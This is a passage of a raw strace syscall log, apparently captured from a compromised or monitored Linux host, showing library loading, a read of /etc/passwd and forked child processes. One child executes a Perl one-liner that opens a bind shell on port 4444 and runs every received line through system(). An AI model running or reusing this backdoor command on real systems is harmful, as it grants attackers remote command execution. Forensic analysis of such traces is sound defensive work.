\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7772  07:20:17.797364 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7772  07:20:17.797383 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d81000

7772  07:20:17.797395 mmap2(0xb7d88000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d88000

7772  07:20:17.797412 close(1)          = 0

7772  07:20:17.797424 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7772  07:20:17.797437 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7772  07:20:17.797451 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7772  07:20:17.797539 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

7772  07:20:17.797556 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d69000

7772  07:20:17.797567 mmap2(0xb7d7d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d7d000

7772  07:20:17.797583 mmap2(0xb7d7f000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d7f000

7772  07:20:17.797600 close(1)          = 0

7772  07:20:17.797675 munmap(0xb7f0f000, 29913) = 0

7772  07:20:17.797710 open("/etc/ld.so.cache", O_RDONLY) = 1

7772  07:20:17.797723 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7772  07:20:17.797740 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0f000

7772  07:20:17.797750 close(1)          = 0

7772  07:20:17.797760 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7772  07:20:17.797775 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7772  07:20:17.797790 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7772  07:20:17.797879 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7772  07:20:17.797897 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5f000

7772  07:20:17.797908 mmap2(0xb7d67000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d67000

7772  07:20:17.797924 close(1)          = 0

7772  07:20:17.797937 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7772  07:20:17.797950 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7772  07:20:17.797965 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7772  07:20:17.798055 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7772  07:20:17.798072 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d54000

7772  07:20:17.798083 mmap2(0xb7d5d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d5d000

7772  07:20:17.798099 close(1)          = 0

7772  07:20:17.798129 munmap(0xb7f0f000, 29913) = 0

7772  07:20:17.798176 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7772  07:20:17.798193 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7772  07:20:17.798220 _llseek(1, 0, [0], SEEK_CUR) = 0

7772  07:20:17.798269 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7772  07:20:17.798301 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f16000

7772  07:20:17.798326 _llseek(1, 1624, [1624], SEEK_SET) = 0

7772  07:20:17.798341 munmap(0xb7f16000, 1624) = 0

7772  07:20:17.798351 close(1)          = 0

7772  07:20:17.798381 getpgrp()         = 3831

7772  07:20:17.798392 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7772  07:20:17.798407 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7772  07:20:17.798423 brk(0x8101000)    = 0x8101000

7772  07:20:17.798455 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7772  07:20:17.798470 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7772  07:20:17.798484 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7772  07:20:17.798522 brk(0x8102000)    = 0x8102000

7772  07:20:17.798548 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7772  07:20:17.798567 stat64("/sbin/AB", 0xbfe3c498) = -1 ENOENT (No such file or directory)

7772  07:20:17.798579 stat64("/bin/AB", 0xbfe3c498) = -1 ENOENT (No such file or directory)

7772  07:20:17.798591 stat64("/usr/sbin/AB", 0xbfe3c498) = -1 ENOENT (No such file or directory)

7772  07:20:17.798602 stat64("/usr/bin/AB", 0xbfe3c498) = -1 ENOENT (No such file or directory)

7772  07:20:17.798616 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7772  07:20:17.798619 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d8a6f8) = 7773

7773  07:20:17.798662 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7773  07:20:17.798679 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7773  07:20:17.798693 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7773  07:20:17.798705 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7773  07:20:17.798721 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7773  07:20:17.798737 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7773  07:20:17.798750 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7773  07:20:17.798807 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7773  07:20:17.798821 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7773  07:20:17.798890 exit_group(127)   = ?

4519  07:20:17.803503 waitpid(7772,  <unfinished ...>

7772  07:20:17.813506 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7772  07:20:17.813506 --- SIGCHLD (Child exited) @ 0 (0) ---

7772  07:20:17.813506 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7773

7772  07:20:17.813507 waitpid(-1, 0xbfe3c118, WNOHANG) = -1 ECHILD (No child processes)

7772  07:20:17.813507 sigreturn()       = ? (mask now [])

7772  07:20:17.813507 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7772  07:20:17.813507 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7772  07:20:17.813507 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7772  07:20:17.813508 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7772  07:20:17.813508 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7772  07:20:17.813508 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7772  07:20:17.813546 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7772  07:20:17.813628 stat64("/sbin/perl", 0xbfe3c4c8) = -1 ENOENT (No such file or directory)

7772  07:20:17.813647 stat64("/bin/perl", 0xbfe3c4c8) = -1 ENOENT (No such file or directory)

7772  07:20:17.813665 stat64("/usr/sbin/perl", 0xbfe3c4c8) = -1 ENOENT (No such file or directory)

7772  07:20:17.813683 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7772  07:20:17.813712 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7772  07:20:17.813750 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7772  07:20:17.813773 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d8a6f8) = 7774

7774  07:20:17.824200 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7774  07:20:17.824293 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7774  07:20:17.824345 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7774  07:20:17.824385 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7774  07:20:17.824430 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7774  07:20:17.824454 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7774  07:20:17.824475 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7774  07:20:17.824525 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7774  07:20:17.824670 brk(0)            = 0x8153000

7774  07:20:17.824737 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7774  07:20:17.824761 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f5b000

7774  07:20:17.824783 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7774  07:20:17.824807 open("/etc/ld.so.cache", O_RDONLY) = 1

7774  07:20:17.824827 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7774  07:20:17.824854 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f53000

7774  07:20:17.824871 close(1)          = 0

7774  07:20:17.824887 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7774  07:20:17.824910 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7774  07:20:17.824931 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7774  07:20:17.825088 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7774  07:20:17.825116 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f4f000

7774  07:20:17.825134 mmap2(0xb7f51000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f51000

7774  07:20:17.825167 close(1)          = 0

7774  07:20:17.825208 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7774  07:20:17.825244 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7774  07:20:17.825266 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7774  07:20:17.825422 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7774  07:20:17.825450 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f2a000

7774  07:20:17.825468 mmap2(0xb7f4d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f4d000

7774  07:20:17.825490 close(1)          = 0

7774  07:20:17.825507 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7774  07:20:17.825528 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7774  07:20:17.825549 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7774  07:20:17.825746 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7774  07:20:17.825773 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f29000

7774  07:20:17.825793 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f11000

7774  07:20:17.825810 mmap2(0xb7f25000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f25000

7774  07:20:17.825832 mmap2(0xb7f27000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f27000

7774  07:20:17.825852 close(1)          = 0

7774  07:20:17.825869 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7774  07:20:17.825890 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7774  07:20:17.825911 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7774  07:20:17.826065 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7774  07:20:17.826094 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc2000

7774  07:20:17.826111 mmap2(0xb7f0b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f0b000

7774  07:20:17.826132 mmap2(0xb7f0e000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f0e000

7774  07:20:17.826164 close(1)          = 0

7774  07:20:17.826207 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7774  07:20:17.826241 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

7774  07:20:17.826263 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, 